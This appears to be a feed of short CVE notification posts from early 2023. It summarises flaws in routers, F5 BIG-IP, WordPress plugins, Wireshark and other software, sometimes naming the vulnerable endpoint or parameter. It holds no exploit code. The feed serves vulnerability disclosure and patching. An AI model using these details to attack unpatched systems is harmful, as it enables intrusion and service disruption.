🚨 CVE-2023-24167Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/add_white_node.🎖@cveNotify |
|
| 2023-02-01 21:29:51 |
🚨 CVE-2022-47073A cross-site scripting (XSS) vulnerability in the Create Ticket page of Small CRM v3.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Subject parameter.🎖@cveNotify |
|
| 2023-02-01 21:29:50 |
🚨 CVE-2023-24170Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/fromSetWirelessRepeat.🎖@cveNotify |
|
| 2023-02-01 21:29:46 |
🚨 CVE-2019-19648In the macho_parse_file functionality in macho/macho.c of YARA 3.11.0, command_size may be inconsistent with the real size. A specially crafted MachO file can cause an out-of-bounds memory access, resulting in Denial of Service (application crash) or potential code execution.🎖@cveNotify |
|
| 2023-02-01 21:29:45 |
🚨 CVE-2023-22501An authentication vulnerability was discovered in Jira Service Management Server and Data Center which allows an attacker to impersonate another user and gain access to a Jira Service Management instance under certain circumstances_._ With write access to a User Directory and outgoing email enabled on a Jira Service Management instance, an attacker could gain access to signup tokens sent to users with accounts that have never been logged into. Access to these tokens can be obtained in two cases: * If the attacker is included on Jira issues or requests with these users, or * If the attacker is forwarded or otherwise gains access to emails containing a “View Request” link from these users. Bot accounts are particularly susceptible to this scenario. On instances with single sign-on, external customer accounts can be affected in projects where anyone can create their own account.🎖@cveNotify |
|
| 2023-02-01 21:29:44 |
🚨 CVE-2023-23969In Django 3.2 before 3.2.17, 4.0 before 4.0.9, and 4.1 before 4.1.6, the parsed values of Accept-Language headers are cached in order to avoid repetitive parsing. This leads to a potential denial-of-service vector via excessive memory usage if the raw value of Accept-Language headers is very large.🎖@cveNotify |
|
| 2023-02-01 21:29:43 |
🚨 CVE-2022-46934kkFileView v4.1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the url parameter at /controller/OnlinePreviewController.java.🎖@cveNotify |
|
| 2023-02-01 21:29:42 |
🚨 CVE-2023-0619The Kraken.io Image Optimizer plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on its AJAX actions in versions up to, and including, 2.6.8. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to reset image optimizations.🎖@cveNotify |
|
| 2023-02-01 21:29:38 |
🚨 CVE-2023-23074Cross site scripting (XSS) vulnerability in Zoho ManageEngine ServiceDesk Plus 14 via embedding videos in the language component.🎖@cveNotify |
|
| 2023-02-01 21:29:37 |
🚨 CVE-2023-23075Cross Site Scripting (XSS) vulnerability in Zoho Asset Explorer 6.9 via the credential name when creating a new Assets Workstation.🎖@cveNotify |
|
| 2023-02-01 21:29:36 |
🚨 CVE-2023-23077Cross site scripting (XSS) vulnerability in Zoho ManageEngine ServiceDesk Plus 13 via the comment field when adding a new status comment.🎖@cveNotify |
|
| 2023-02-01 20:30:06 |
🚨 CVE-2023-22281On versions 17.0.x before 17.0.0.2, 16.1.x before 16.1.3.3, 15.1.x before 15.1.8, 14.1.x before 14.1.5.3, and all versions of 13.1.x, when a BIG-IP AFM NAT policy with a destination NAT rule is configured on a FastL4 virtual server, undisclosed traffic can cause the Traffic Management Microkernel (TMM) to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-01 20:30:04 |
🚨 CVE-2023-22281On versions 17.0.x before 17.0.0.2, 16.1.x before 16.1.3.3, 15.1.x before 15.1.8, 14.1.x before 14.1.5.3, and all versions of 13.1.x, when a BIG-IP AFM NAT policy with a destination NAT rule is configured on a FastL4 virtual server, undisclosed traffic can cause the Traffic Management Microkernel (TMM) to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-01 20:30:03 |
🚨 CVE-2023-22283On versions beginning in 7.1.5 to before 7.2.3.1, a DLL hijacking vulnerability exists in the BIG-IP Edge Client for Windows. User interaction and administrative privileges are required to exploit this vulnerability because the victim user needs to run the executable on the system and the attacker requires administrative privileges for modifying the files in the trusted search path. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-01 20:30:01 |
🚨 CVE-2023-22283On versions beginning in 7.1.5 to before 7.2.3.1, a DLL hijacking vulnerability exists in the BIG-IP Edge Client for Windows. User interaction and administrative privileges are required to exploit this vulnerability because the victim user needs to run the executable on the system and the attacker requires administrative privileges for modifying the files in the trusted search path. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-01 20:30:00 |
🚨 CVE-2023-22302In BIG-IP versions 17.0.x before 17.0.0.2, and 16.1.x beginning in 16.1.2.2 to before 16.1.3.3, when an HTTP profile is configured on a virtual server and conditions beyond the attacker’s control exist on the target pool member, undisclosed requests sent to the BIG-IP system can cause the Traffic Management Microkernel (TMM) to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-01 20:29:58 |
🚨 CVE-2023-22326In BIG-IP versions 17.0.x before 17.0.0.2, 16.1.x before 16.1.3.3, 15.1.x before 15.1.8.1, 14.1.x before 14.1.5.3, and all versions of 13.1.x, and all versions of BIG-IQ 8.x and 7.1.x, incorrect permission assignment vulnerabilities exist in the iControl REST and TMOS shell (tmsh) dig command which may allow an authenticated attacker with resource administrator or administrator role privileges to view sensitive information. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-01 20:29:57 |
🚨 CVE-2023-22323In BIP-IP versions 17.0.x before 17.0.0.2, 16.1.x before 16.1.3.3, 15.1.x before 15.1.8.1, 14.1.x before 14.1.5.3, and all versions of 13.1.x, when OCSP authentication profile is configured on a virtual server, undisclosed requests can cause an increase in CPU resource utilization. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-01 20:29:55 |
🚨 CVE-2023-22340On BIG-IP versions 16.1.x before 16.1.3.3, 15.1.x before 15.1.8, 14.1.x before 14.1.5.3, and all versions of 13.1.x, when a SIP profile is configured on a Message Routing type virtual server, undisclosed traffic can cause TMM to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-01 20:29:54 |
🚨 CVE-2023-22341On version 14.1.x before 14.1.5.3, and all versions of 13.1.x, when the BIG-IP APM system is configured with all the following elements, undisclosed requests may cause the Traffic Management Microkernel (TMM) to terminate: * An OAuth Server that references an OAuth Provider * An OAuth profile with the Authorization Endpoint set to '/' * An access profile that references the above OAuth profile and is associated with an HTTPS virtual server Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-01 20:29:52 |
🚨 CVE-2023-22358In versions beginning with 7.2.2 to before 7.2.3.1, a DLL hijacking vulnerability exists in the BIG-IP Edge Client Windows Installer. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-01 20:29:51 |
🚨 CVE-2023-22374In BIG-IP starting in versions 17.0.0, 16.1.2.2, 15.1.5.1, 14.1.4.6, and 13.1.5 on their respective branches, a format string vulnerability exists in iControl SOAP that allows an authenticated attacker to crash the iControl SOAP CGI process or, potentially execute arbitrary code. In appliance mode BIG-IP, a successful exploit of this vulnerability can allow the attacker to cross a security boundary. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-01 20:29:50 |
🚨 CVE-2023-22418On versions 17.0.x before 17.0.0.2, 16.1.x before 16.1.3.3, 15.1.x before 15.1.7, 14.1.x before 14.1.5.3, and all versions of 13.1.x, an open redirect vulnerability exists on virtual servers enabled with a BIG-IP APM access policy. This vulnerability allows an unauthenticated malicious attacker to build an open redirect URI. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-01 20:29:48 |
🚨 CVE-2023-22422On BIG-IP versions 17.0.x before 17.0.0.2 and 16.1.x before 16.1.3.3, when a HTTP profile with the non-default Enforcement options of Enforce HTTP Compliance and Unknown Methods: Reject are configured on a virtual server, undisclosed requests can cause the Traffic Management Microkernel (TMM) to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-01 20:29:47 |
🚨 CVE-2023-22657On F5OS-A beginning in version 1.2.0 to before 1.3.0 and F5OS-C beginning in version 1.3.0 to before 1.5.0, processing F5OS tenant file names may allow for command injection. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-01 20:29:46 |
🚨 CVE-2023-22664On BIG-IP versions 17.0.x before 17.0.0.2 and 16.1.x before 16.1.3.3, and BIG-IP SPK starting in version 1.6.0, when a client-side HTTP/2 profile and the HTTP MRF Router option are enabled for a virtual server, undisclosed requests can cause an increase in memory resource utilization. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-01 20:29:44 |
🚨 CVE-2023-22839On BIG-IP versions 17.0.x before 17.0.0.2, 16.1.x before 16.1.3.3, 15.1.x before 15.1.8.1, 14.1.x before 14.1.5.3, and all version of 13.1.x, when a DNS profile with the Rapid Response Mode setting enabled is configured on a virtual server with hardware SYN cookies enabled, undisclosed requests cause the Traffic Management Microkernel (TMM) to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-01 20:29:42 |
🚨 CVE-2023-22842On BIG-IP versions 16.1.x before 16.1.3.3, 15.1.x before 15.1.8.1, 14.1.x before 14.1.5.3, and all versions of 13.1.x, when a SIP profile is configured on a Message Routing type virtual server, undisclosed traffic can cause the Traffic Management Microkernel (TMM) to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-01 20:29:41 |
🚨 CVE-2023-23552On versions 17.0.x before 17.0.0.2, 16.1.x before 16.1.3.3, 15.1.0 before 15.1.8, 14.1.x before 14.1.5.3, and all versions of 13.1.x, when a BIG-IP Advanced WAF or BIG-IP ASM security policy is configured on a virtual server, undisclosed requests can cause an increase in memory resource utilization. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-01 20:29:40 |
🚨 CVE-2023-23555On BIG-IP Virtual Edition versions 15.1x beginning in 15.1.4 to before 15.1.8 and 14.1.x beginning in 14.1.5 to before 14.1.5.3, and BIG-IP SPK beginning in 1.5.0 to before 1.6.0, when FastL4 profile is configured on a virtual server, undisclosed traffic can cause the Traffic Management Microkernel (TMM) to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-01 20:29:38 |
🚨 CVE-2022-41794A heap based buffer overflow vulnerability exists in the PSD thumbnail resource parsing code of OpenImageIO 2.3.19.0. A specially-crafted PSD file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-02-01 18:30:07 |
🚨 CVE-2022-21192All versions of the package serve-lite are vulnerable to Directory Traversal due to missing input sanitization or other checks and protections employed to the req.url passed as-is to path.join().🎖@cveNotify |
|
| 2023-02-01 18:30:06 |
🚨 CVE-2018-3964An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader version 9.1.0.5096. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.🎖@cveNotify |
|
| 2023-02-01 18:30:05 |
🚨 CVE-2020-22327An issue was discovered in HFish 0.5.1. When a payload is inserted where the name is entered, XSS code is triggered when the administrator views the information.🎖@cveNotify |
|
| 2023-02-01 18:30:03 |
🚨 CVE-2022-25350All versions of the package puppet-facter are vulnerable to Command Injection via the getFact function due to improper input sanitization.🎖@cveNotify |
|
| 2023-02-01 18:30:02 |
🚨 CVE-2019-10957Geutebruck IP Cameras G-Code(EEC-2xxx), G-Cam(EBC-21xx/EFD-22xx/ETHC-22xx/EWPC-22xx): All versions 1.12.0.25 and prior may allow a remote authenticated attacker with access to event configuration to store malicious code on the server, which could later be triggered by a legitimate user resulting in code execution within the user’s browser.🎖@cveNotify |
|
| 2023-02-01 18:30:01 |
🚨 CVE-2023-0411Excessive loops in multiple dissectors in Wireshark 4.0.0 to 4.0.2 and 3.6.0 to 3.6.10 and allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-02-01 18:29:59 |
🚨 CVE-2023-0412TIPC dissector crash in Wireshark 4.0.0 to 4.0.2 and 3.6.0 to 3.6.10 and allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-02-01 18:29:58 |
🚨 CVE-2023-0414Crash in the EAP dissector in Wireshark 4.0.0 to 4.0.2 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-02-01 18:29:57 |
🚨 CVE-2023-0413Dissection engine bug in Wireshark 4.0.0 to 4.0.2 and 3.6.0 to 3.6.10 and allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-02-01 18:29:55 |
🚨 CVE-2019-13767Use after free in media picker in Google Chrome prior to 79.0.3945.88 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.🎖@cveNotify |
|
| 2023-02-01 18:29:54 |
🚨 CVE-2023-0415iSCSI dissector crash in Wireshark 4.0.0 to 4.0.2 and 3.6.0 to 3.6.10 and allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-02-01 18:29:53 |
🚨 CVE-2023-0417Memory leak in the NFS dissector in Wireshark 4.0.0 to 4.0.2 and 3.6.0 to 3.6.10 and allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-02-01 18:29:52 |
🚨 CVE-2023-0416GNW dissector crash in Wireshark 4.0.0 to 4.0.2 and 3.6.0 to 3.6.10 and allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-02-01 18:29:50 |
🚨 CVE-2022-21810All versions of the package smartctl are vulnerable to Command Injection via the info method due to improper input sanitization.🎖@cveNotify |
|
| 2023-02-01 18:29:49 |
🚨 CVE-2022-44641In Linaro Automated Validation Architecture (LAVA) before 2022.11, users with valid credentials can submit crafted XMLRPC requests that cause a recursive XML entity expansion, leading to excessive use of memory on the server and a Denial of Service.🎖@cveNotify |
|
| 2023-02-01 18:29:48 |
🚨 CVE-2022-48093Seacms v12.7 was discovered to contain a remote code execution (RCE) vulnerability via the ip parameter at admin_ ip.php.🎖@cveNotify |
|
| 2023-02-01 18:29:47 |
🚨 CVE-2022-48094lmxcms v1.41 was discovered to contain an arbitrary file read vulnerability via TemplateAction.class.php.🎖@cveNotify |
|
| 2023-02-01 18:29:46 |
🚨 CVE-2023-23135An arbitrary file upload vulnerability in Ftdms v3.1.6 allows attackers to execute arbitrary code via uploading a crafted JPG file.🎖@cveNotify |
|
| 2023-02-01 18:29:45 |
🚨 CVE-2023-23136lmxcms v1.41 was discovered to contain an arbitrary file deletion vulnerability via BackdbAction.class.php.🎖@cveNotify |
|
| 2023-02-01 18:29:44 |
🚨 CVE-2022-4202A vulnerability, which was classified as problematic, was found in GPAC 2.1-DEV-rev490-g68064e101-master. Affected is the function lsr_translate_coords of the file laser/lsr_dec.c. The manipulation leads to integer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is b3d821c4ae9ba62b3a194d9dcb5e99f17bd56908. It is recommended to apply a patch to fix this issue. VDB-214518 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-01 16:30:02 |
🚨 CVE-2022-42378This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. Crafted data in a U3D file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18631.🎖@cveNotify |
|
| 2023-02-01 16:30:01 |
🚨 CVE-2022-42371This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. Crafted data in a U3D file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18346.🎖@cveNotify |
|
| 2023-02-01 16:30:00 |
🚨 CVE-2022-42370This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. Crafted data in a U3D file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18345.🎖@cveNotify |
|
| 2023-02-01 16:29:59 |
🚨 CVE-2022-41149This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. Crafted data in a U3D file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18339.🎖@cveNotify |
|
| 2023-02-01 16:29:58 |
🚨 CVE-2022-41151This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. Crafted data in a U3D file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18341.🎖@cveNotify |
|
| 2023-02-01 16:29:56 |
🚨 CVE-2022-47003A vulnerability in the Remember Me function of Mura CMS before v10.0.580 allows attackers to bypass authentication via a crafted web request.🎖@cveNotify |
|
| 2023-02-01 16:29:55 |
🚨 CVE-2022-47714Last Yard 22.09.8-1 does not enforce HSTS headers🎖@cveNotify |
|
| 2023-02-01 16:29:54 |
🚨 CVE-2022-47715In Last Yard 22.09.8-1, the cookie can be stolen via via unencrypted traffic.🎖@cveNotify |
|
| 2023-02-01 16:29:52 |
🚨 CVE-2022-47717Last Yard 22.09.8-1 is vulnerable to Cross-origin resource sharing (CORS).🎖@cveNotify |
|
| 2023-02-01 16:29:50 |
🚨 CVE-2023-0611A vulnerability, which was classified as critical, has been found in TRENDnet TEW-652BRP 3.04B01. This issue affects some unknown processing of the file get_set.ccp of the component Web Management Interface. The manipulation leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-219935.🎖@cveNotify |
|
| 2023-02-01 16:29:48 |
🚨 CVE-2023-0612A vulnerability, which was classified as critical, was found in TRENDnet TEW-811DRU 1.0.10.0. Affected is an unknown function of the file /wireless/basic.asp of the component httpd. The manipulation of the argument device_web_ip leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-219936.🎖@cveNotify |
|
| 2023-02-01 16:29:47 |
🚨 CVE-2023-22573Dell PowerScale OneFS 9.0.0.x-9.4.0.x contain an insertion of sensitive information into log file vulnerability in cloudpool. A low privileged local attacker could potentially exploit this vulnerability, leading to sensitive information disclosure.🎖@cveNotify |
|
| 2023-02-01 16:29:46 |
🚨 CVE-2023-22574Dell PowerScale OneFS 9.0.0.x - 9.4.0.x contain an insertion of sensitive information into log file vulnerability in platform API of IPMI module. A low-privileged user with permission to read logs on the cluster could potentially exploit this vulnerability, leading to Information disclosure and denial of service.🎖@cveNotify |
|
| 2023-02-01 16:29:42 |
🚨 CVE-2023-22575Dell PowerScale OneFS 9.0.0.x - 9.4.0.x contain an insertion of sensitive information into log file vulnerability in celog. A low privileges user could potentially exploit this vulnerability, leading to information disclosure and escalation of privileges.🎖@cveNotify |
|
| 2023-02-01 16:29:41 |
🚨 CVE-2023-23126Connectwise Automate 2022.11 is vulnerable to Clickjacking. The login screen can be iframed and used to manipulate users to perform unintended actions.🎖@cveNotify |
|
| 2023-02-01 16:29:40 |
🚨 CVE-2023-23127In Connectwise Control 22.8.10013.8329, the login page does not implement HSTS headers therefore not enforcing HTTPS.🎖@cveNotify |
|
| 2023-02-01 16:29:39 |
🚨 CVE-2023-23128Connectwise Control 22.8.10013.8329 is vulnerable to Cross Origin Resource Sharing (CORS).🎖@cveNotify |
|
| 2023-02-01 16:29:38 |
🚨 CVE-2023-23130Connectwise Automate 2022.11 is vulnerable to Cleartext authentication. Authentication is being done via HTTP (cleartext) with SSL disabled.🎖@cveNotify |
|
| 2023-02-01 07:29:53 |
🚨 CVE-2022-42972A CWE-732: Incorrect Permission Assignment for Critical Resource vulnerability exists that could cause local privilege escalation when a local attacker modifies the webroot directory. Affected Products: APC Easy UPS Online Monitoring Software (Windows 7, 10, 11 & Windows Server 2016, 2019, 2022 - Versions prior to V2.5-GA), APC Easy UPS Online Monitoring Software (Windows 11, Windows Server 2019, 2022 - Versions prior to V2.5-GA-01-22261), Schneider Electric Easy UPS Online Monitoring Software (Windows 7, 10, 11 & Windows Server 2016, 2019, 2022 - Versions prior to V2.5-GS), Schneider Electric Easy UPS Online Monitoring Software (Windows 11, Windows Server 2019, 2022 - Versions prior to V2.5-GS-01-22261)🎖@cveNotify |
|
| 2023-02-01 07:29:52 |
🚨 CVE-2022-2329A CWE-190: Integer Overflow or Wraparound vulnerability exists that could cause heap-based buffer overflow, leading to denial of service and potentially remote code execution when an attacker sends multiple specially crafted messages. Affected Products: IGSS Data Server - IGSSdataServer.exe (Versions prior to V15.0.0.22073)🎖@cveNotify |
|
| 2023-02-01 07:29:51 |
🚨 CVE-2022-42970A CWE-306: Missing Authentication for Critical Function The software does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources. Affected Products: APC Easy UPS Online Monitoring Software (Windows 7, 10, 11 & Windows Server 2016, 2019, 2022 - Versions prior to V2.5-GA), APC Easy UPS Online Monitoring Software (Windows 11, Windows Server 2019, 2022 - Versions prior to V2.5-GA-01-22261), Schneider Electric Easy UPS Online Monitoring Software (Windows 7, 10, 11 & Windows Server 2016, 2019, 2022 - Versions prior to V2.5-GS), Schneider Electric Easy UPS Online Monitoring Software (Windows 11, Windows Server 2019, 2022 - Versions prior to V2.5-GS-01-22261)🎖@cveNotify |
|
| 2023-02-01 07:29:48 |
🚨 CVE-2022-4062A CWE-285: Improper Authorization vulnerability exists that could cause unauthorized access to certain software functions when an attacker gets access to localhost interface of the EcoStruxure Power Commission application. Affected Products: EcoStruxure Power Commission (Versions prior to V2.25)🎖@cveNotify |
|
| 2023-02-01 07:29:47 |
🚨 CVE-2021-22786A CWE-200: Information Exposure vulnerability exists that could cause the exposure of sensitive information stored on the memory of the controller when communicating over the Modbus TCP protocol. Affected Products: Modicon M340 CPU (part numbers BMXP34*) (Versions prior to V3.30), Modicon M580 CPU (part numbers BMEP* and BMEH*) (Versions prior to SV3.20), Modicon MC80 (BMKC80) (Versions prior to V1.6), Modicon M580 CPU Safety (part numbers BMEP58*S and BMEH58*S) (All Versions), Modicon Momentum MDI (171CBU*) (Versions prior to V2.3), Legacy Modicon Quantum (All Versions)🎖@cveNotify |
|
| 2023-02-01 07:29:46 |
🚨 CVE-2023-0524As part of our Security Development Lifecycle, a potential privilege escalation issue was identified internally. This could allow a malicious actor with sufficient permissions to modify environment variables and abuse an impacted plugin in order to escalate privileges. We have resolved the issue and also made several defense-in-depth fixes alongside. While the probability of successful exploitation is low, Tenable is committed to securing our customers’ environments and our products. The updates have been distributed via the Tenable plugin feed in feed serial numbers equal to or greater than #202212212055.🎖@cveNotify |
|
| 2023-02-01 07:29:42 |
🚨 CVE-2023-0454OrangeScrum version 2.0.11 allows an authenticated external attacker to delete arbitrary local files from the server. This is possible because the application uses an unsanitized attacker-controlled parameter to construct an internal path.🎖@cveNotify |
|
| 2023-02-01 07:29:41 |
🚨 CVE-2023-0587A file upload vulnerability in exists in Trend Micro Apex One server build 11110. Using a malformed Content-Length header in an HTTP PUT message sent to URL /officescan/console/html/cgi/fcgiOfcDDA.exe, an unauthenticated remote attacker can upload arbitrary files to the SampleSubmission directory (i.e., \PCCSRV\TEMP\SampleSubmission) on the server. The attacker can upload a large number of large files to fill up the file system on which the Apex One server is installed.🎖@cveNotify |
|
| 2023-02-01 07:29:37 |
🚨 CVE-2022-4790The WP Google My Business Auto Publish WordPress plugin before 3.4 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.🎖@cveNotify |
|
| 2023-02-01 07:29:36 |
🚨 CVE-2022-4760The OneClick Chat to Order WordPress plugin before 1.0.4.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-02-01 07:29:35 |
🚨 CVE-2022-4775The GeoDirectory WordPress plugin before 2.2.22 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-02-01 01:29:55 |
🚨 CVE-2023-24956Forget Heart Message Box v1.1 was discovered to contain a SQL injection vulnerability via the name parameter at /cha.php.🎖@cveNotify |
|
| 2023-02-01 01:29:54 |
🚨 CVE-2021-37789stb_image.h 2.27 has a heap-based buffer over in stbi__jpeg_load, leading to Information Disclosure or Denial of Service.🎖@cveNotify |
|
| 2023-02-01 01:29:53 |
🚨 CVE-2022-28041stb_image.h v2.27 was discovered to contain an integer overflow via the function stbi__jpeg_decode_block_prog_dc. This vulnerability allows attackers to cause a Denial of Service (DoS) via unspecified vectors.🎖@cveNotify |
|
| 2023-02-01 01:29:52 |
🚨 CVE-2021-28021Buffer overflow vulnerability in function stbi__extend_receive in stb_image.h in stb 2.26 via a crafted JPEG file.🎖@cveNotify |
|
| 2023-02-01 01:29:48 |
🚨 CVE-2019-13217A heap buffer overflow in the start_decoder function in stb_vorbis through 2019-03-04 allows an attacker to cause a denial of service or execute arbitrary code by opening a crafted Ogg Vorbis file.🎖@cveNotify |
|
| 2023-02-01 01:29:47 |
🚨 CVE-2019-13218Division by zero in the predict_point function in stb_vorbis through 2019-03-04 allows an attacker to cause a denial of service by opening a crafted Ogg Vorbis file.🎖@cveNotify |
|
| 2023-02-01 01:29:43 |
🚨 CVE-2019-13219A NULL pointer dereference in the get_window function in stb_vorbis through 2019-03-04 allows an attacker to cause a denial of service by opening a crafted Ogg Vorbis file.🎖@cveNotify |
|
| 2023-02-01 01:29:42 |
🚨 CVE-2019-13223A reachable assertion in the lookup1_values function in stb_vorbis through 2019-03-04 allows an attacker to cause a denial of service by opening a crafted Ogg Vorbis file.🎖@cveNotify |
|
| 2023-02-01 01:29:41 |
🚨 CVE-2022-47873Netcad KEOS 1.0 is vulnerable to XML External Entity (XXE) resulting in SSRF with XXE (remote).🎖@cveNotify |
|
| 2023-02-01 01:29:37 |
🚨 CVE-2020-21531fig2dev 3.2.7b contains a global buffer overflow in the conv_pattern_index function in gencgm.c.🎖@cveNotify |
|
| 2023-02-01 01:29:36 |
🚨 CVE-2020-21532fig2dev 3.2.7b contains a global buffer overflow in the setfigfont function in genepic.c.🎖@cveNotify |
|
| 2023-02-01 01:29:35 |
🚨 CVE-2020-21676A stack-based buffer overflow in the genpstrx_text() component in genpstricks.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into pstricks format.🎖@cveNotify |
|
| 2023-01-31 23:30:06 |
🚨 CVE-2020-26566A Denial of Service condition in Motion-Project Motion 3.2 through 4.3.1 allows remote unauthenticated users to cause a webu.c segmentation fault and kill the main process via a crafted HTTP request.🎖@cveNotify |
|
| 2023-01-31 23:30:05 |
🚨 CVE-2020-27619In Python 3 through 3.9.0, the Lib/test/multibytecodec_support.py CJK codec tests call eval() on content retrieved via HTTP.🎖@cveNotify |
|
| 2023-01-31 23:30:03 |
🚨 CVE-2020-13943If an HTTP/2 client connecting to Apache Tomcat 10.0.0-M1 to 10.0.0-M7, 9.0.0.M1 to 9.0.37 or 8.5.0 to 8.5.57 exceeded the agreed maximum number of concurrent streams for a connection (in violation of the HTTP/2 protocol), it was possible that a subsequent request made on that connection could contain HTTP headers - including HTTP/2 pseudo headers - from a previous request rather than the intended headers. This could lead to users seeing responses for unexpected resources.🎖@cveNotify |
|
| 2023-01-31 23:30:02 |
🚨 CVE-2020-26935An issue was discovered in SearchController in phpMyAdmin before 4.9.6 and 5.x before 5.0.3. A SQL injection vulnerability was discovered in how phpMyAdmin processes SQL statements in the search feature. An attacker could use this flaw to inject malicious SQL in to a query.🎖@cveNotify |
|
| 2023-01-31 23:30:01 |
🚨 CVE-2020-26164In kdeconnect-kde (aka KDE Connect) before 20.08.2, an attacker on the local network could send crafted packets that trigger use of large amounts of CPU, memory, or network connection slots, aka a Denial of Service attack.🎖@cveNotify |
|
| 2023-01-31 23:29:58 |
🚨 CVE-2020-5387Dell XPS 13 9370 BIOS versions prior to 1.13.1 contains an Improper Exception Handling vulnerability. A local attacker with physical access could exploit this vulnerability to prevent the system from booting until the exploited boot device is removed.🎖@cveNotify |
|
| 2023-01-31 23:29:57 |
🚨 CVE-2020-26154url.cpp in libproxy through 0.4.15 is prone to a buffer overflow when PAC is enabled, as demonstrated by a large PAC file that is delivered without a Content-length header.🎖@cveNotify |
|
| 2023-01-31 23:29:56 |
🚨 CVE-2020-26137urllib3 before 1.25.9 allows CRLF injection if the attacker controls the HTTP request method, as demonstrated by inserting CR and LF control characters in the first argument of putrequest(). NOTE: this is similar to CVE-2020-26116.🎖@cveNotify |
|
| 2023-01-31 23:29:55 |
